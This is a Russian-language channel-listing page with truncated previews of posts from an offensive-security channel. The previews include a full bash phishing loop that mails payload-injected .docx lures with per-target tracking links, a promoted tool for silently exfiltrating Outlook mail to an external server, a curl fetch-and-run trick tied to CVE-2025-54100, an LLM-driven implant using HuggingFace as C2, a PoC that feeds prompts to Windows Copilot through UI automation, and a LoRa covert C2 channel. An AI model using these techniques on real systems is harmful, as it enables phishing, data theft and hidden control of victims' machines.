@ad_poheque
Будь тем, чем другие не были. https://boosty.to/ghe770mvp
О канале AD_POHEQUE
Будь тем, чем другие не были. https://boosty.to/ghe770mvp
AI-обзор
Обновлено 18.07.2026Канал "AD_POHEQUE" публикует материалы по информационной безопасности и кибербезопасности. В последних постах обсуждаются темы, связанные с Active Directory, веб-сканированием, фишингом и обходом защитных мер. Контент канала может быть интересен специалистам в области IT-безопасности и всем, кто интересуется киберпреступностью.
Описание сформировано MaxBook AI на основе последних публикаций канала.
Основные метрики
Рост подписчиков
Вовлечённость
Здоровье аудитории
Часовая активность
МСККогда канал публикует — распределение постов по часам суток.
Последние публикации канала «AD_POHEQUE»
- 605 просмотров, 12 реакций, 12 июл. 2026 г.
датасет с 4598 решенными лабами с кракми https://github.com/crackmesone/crackmes-re-dataset подглядел тут
Открыть пост в MAX - 2.2K просмотров, 15 реакций, 30 июн. 2026 г.
доклад Дмитрия Неверова «Автоматизируй Это!» со StandoffTalks 2026 точно стоит вашего времени. идея простая: использовать BloodHound не только для пометок owned / high value на объектах AD, но и вести граф как карту продвижения по ходу проекта - плюс генерировать команды под эксплуатацию прямо из ребер. автор честно говорит, что это пока концепция, и развивать ее определенно имеет смысл. как минимум напрашивается телеметрия: фиксировать сформированную команду, результат выполнения, временную метку и прочие полезные данные по каждому шагу. тогда для SOC продвижение пентестера перестаёт быть…
Открыть пост в MAX - 2.4K просмотров, 14 реакций, 24 мая 2026 г.
генералсон, у нас есть палантир дома. https://www.osirisai.live/ https://github.com/simplifaisoul/osiris
Открыть пост в MAX - 3.2K просмотров, 26 реакций, 20 мар. 2026 г.
это я к чему? да просто что бы вы оценили эффективность работы ТСПУ 😎
Открыть пост в MAX - 8.8K просмотров, 32 реакций, 09 февр. 2026 г.
acunetix — бесспорный эталон качества среди сканеров веб-уязвимостей. в России с ним вечная драма: вендор капризничает, лицензии не продаёт, а очередной «кряк» нередко пахнет чужим трояном. мой давний друг и коллега, Леонид изъял у acunetix главное — базу проверок. посадил этот «мозг» на собственный python-движок. без монструозного gui, без привязки к конкретной ос, без необходимости кормиться чужими сомнительными «таблетками». и назвал его — acuscan. очевидный профит: — качество проверок остаётся на уровне acunetix, источник тот же — переносимость: linux, macos, контейнеры, ci/cd — хоть на…
Открыть пост в MAX - 3.5K просмотров, 17 реакций, 23 янв. 2026 г.
ADScan оснастка для автоматизированного тестирования и пост-эксплуатации Active Directory позавчера помер crackmapexec, вчера бранясь переезжали на netexec, половина приёмов в powershell, половина в python и каждый раз всё собирается руками под конкретный проект. вопрос: зачем ещё один AD-сканер, если у всех уже есть все перечисленное выше? инструмент работает в связке с bloodhound-ce: - самостоятельно строит цепь эксплуатации: разведка → bloodhound → kerberos-атаки → обработка хэшей и работа с уязвимыми аклями - живёт как агент: выбрал сценарий, дал учетные данные — он прогнал плейбук и…
Открыть пост в MAX - 2.8K просмотров, 30 реакций, 14 янв. 2026 г.
владельцев скомпрометированных учётных записей народного ментсенджера ждут санкции со стороны государства.
Открыть пост в MAX - 3.0K просмотров, 21 реакций, 13 янв. 2026 г.
РОБОТ, РОБОТ, ВЫПОЛНИ МОЙ PAYLOAD в Windows появился ещё один интерпретатор наших желаний. smelly после недавних «инициатив» Microsoft обмазать весь Windows Copilot’ом накатал простенький PoC в стиле living off the assistant. «помощник» в системе - такой же элемент поверхности атаки, как браузер или почта. работа smelly как демо подхода прекрасна, но для фундамента боевого инструмента - сыро. COM-сервер, который через ui automation притворяется слепым юзером и тихо жмет на кнопки copilot’а: - находит окно copilot по имени, - вытаскивает edit-бокс ввода, - засовывает туда свой промпт, - жмёт…
Открыть пост в MAX - 2.5K просмотров, 19 реакций, 12 янв. 2026 г.
фишинг годами слал через одну строку на bash, буквально: while read user; do mkdir $user && python3 payload_injector.py -i mobilainique_telecom.docx -o ./$user/mobilainique_telecom.docx --tracking-url http://mobilainique.tech/index.html?utm_src=$user --custom-xml PowerBI && cat text.txt | mutt -s 'Специальный тариф от Мобилайник-Телеком для сотрудников EXAMPLE CORP' $user -a ./$user/mobilainique_telecom.docx; done < mail_list.txt сейчас появилась потребность расширить функционал, создать комплексное решение для проведения кампаний, анализировать больше телеметрии. оценивать не только уровень…
Открыть пост в MAX - 2.1K просмотров, 37 реакций, 31 дек. 2025 г.
сегодняшняя дата - просто отметка в принятой системе исчисления. цифра сменится, а “перерождение“, “новая жизнь с понедельника” как и в этом году останутся заезженными речевыми оборотами. следующий год будет продолжением уходящего. бывает непросто, но это почти всегда следствие нашего выбора. кто весь год ныл про “справедливость”, искал виноватых, ябедничал — их поздравляем: обстоятельства никуда не денутся. такие и в новом году останутся тем же пустым местом, но с новой датой в календаре. мы другой породы. мы являемся, не пытаясь казаться. времена бывают разные, а вызовы все серьезнее - и…
Открыть пост в MAX - 2.3K просмотров, 24 реакций, 29 дек. 2025 г.
LAMEHUG / LAMEHACK сегодня у меня день рождения, вместо тоста – вспомним самый угарный имплант года : да, он в самом деле lame . простая связка python+pyinstaller , его явно написали во время перекура. но в этом-то и кайф: 20% усилий → 80% импакта. мне тут понравился подход: масса рутины вынесена напрямую llm , имплант здесь тонкий клиент к ai-агенту, который словно автопилот сам продумывает, какие команды гонять на винде. huggingface в роли канала C2 – вообще песня: “кхм, это у нас ai-интеграции, не блочьте, нам надо для инноваций”. маленький, местами кривой, но гордый имплант, который…
Открыть пост в MAX - 4.6K просмотров, 75 реакций, 20 дек. 2025 г.
интернет отрубили, vpn задушили, ngfw дышит в затылок — а у тебя свой маленький «биврёст» на LoRa. meshtastic как канал связи. при желании докручивается до ExpressLRS/ Crossfire, умельцы есть. это ровно то, чего нет в корпоративных методичках: альтернативный, медленный, но живучий канал управления. никакого tcp/ip, никакого dpi, никакого «давайте добавим сигнатуру в next gen firewall» — трафик ушёл в эфир и прошёл мимо их игрушек. решат бороться с такой закладкой через РЭБ расположенный в офисе или цеху, то лягут: • bluetooth-наушники любимых сеньоров • «умные» кондиционеры • половина…
Открыть пост в MAX - 2.3K просмотров, 20 реакций, 19 дек. 2025 г.
пока я пишу видеоролик про обход песочницы и исполнение в heap’е — написал честную статью. почему "информационная безопасность" в текущем виде — миф, удобный исключительно акторам и вендорам. фидбек хороший, вам тоже зайдёт. читайте. https://boosty.to/ghe770mvp/posts/bfc7c31a-d059-403c-9abf-a0b86f175a30?utm_src=ad_poheque 👾
Открыть пост в MAX - 2.7K просмотров, 14 реакций, 16 дек. 2025 г.
ТИХОЕ КОПИРОВАНИЕ ПОЧТЫ БЕЗ ТОРМОЗОВ OUTLOOK'A как тихо выгрузить почту с Windows, не роняя Outlook Classic, не подавая особых сигналов для SOC? на бусти разобрал способ эксфильтрации OST через теневые копии + выгрузку по http на внешний сервер. ссылку на рабочий инструмент положил прямо в статье. идите читать. https://boosty.to/ghe770mvp/posts/1ac8dbee-e949-4380-a50c-032ca25fa499?share=post_link #RedTeam #Pentest #DFIR #OPSEC 👾
Открыть пост в MAX - 3.2K просмотров, 32 реакций, 11 дек. 2025 г.
помните, коллеги, как мы прятали три заветные буквы IEX в именах файлов, DNS-записях и прочем мусоре, скремблировали их словно Котельников речь в Соболе? так вот, в свежих сборках винды нам сами завезли подарок: curl / Invoke-WebRequest без -UseBasicParsing поднимает старый IE-движок и хавает <script> прямо из ответа. CVE-2025-54100: можно больше не палиться с | iex, достаточно один раз дернуть «невинный» curl http://…/a.js — а дальше уже вопрос фантазии и цепочки. у неискушённых может возникнуть вопрос: "так это же просто javascript, что с ним сделать можно помимо alert(1)?" ха-ха. из самого…
Открыть пост в MAX
Качество и доверие
Эвристические сигналы качества по публичным метрикам (охват, реакции, динамика подписчиков). Это не доказанный фрод и не приговор — лишь поводы присмотреться к каналу.
Реклама и монетизация
Средние показатели последних публикаций. Тип определён по тексту поста — оценочно.
Цитирование
Сколько раз канал упомянут и репостнут в постах других каналов.